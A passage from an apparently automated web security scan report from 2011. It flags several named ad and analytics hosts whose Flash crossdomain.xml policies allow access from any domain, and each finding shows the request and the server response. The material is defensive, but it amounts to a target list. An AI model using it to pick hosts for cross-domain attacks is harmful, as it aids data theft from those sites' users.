Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.11. http://as.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:23:31 GMT
ETag: "17b0daf-e6-41faec0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 03 May 2011 15:41:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.12. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.13. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:42:35 GMT
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.14. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 03 May 2011 15:41:29 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.15. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Tue, 03 May 2011 15:41:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.16. http://c.yardbarker.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.yardbarker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.yardbarker.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 03 May 2011 17:09:23 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.17. http://cache.specificmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:14 GMT
Server: PWS/1.7.2.1
X-Px: ht-d iad-agg-n27.panthercdn.com
ETag: "17186ff-110-4764a5a086640"
Cache-Control: max-age=604800
Expires: Sun, 08 May 2011 22:30:53 GMT
Age: 148281
Content-Length: 272
Content-Type: application/xml
Last-Modified: Mon, 19 Oct 2009 14:13:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://ads.specificmedia.com -->
<cross-d
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.18. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Tue, 03 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.19. http://cms.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cms.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 04 May 2011 15:42:40 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 03 May 2011 15:42:40 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.20. http://d.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 15:41:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:33:37 GMT
Content-length: 202
Etag: "ca-4ceae1b1"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.21. http://d13.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d13.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d13.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
X-Varnish: 1739410876
Date: Tue, 03 May 2011 15:41:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.22. http://d3.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Al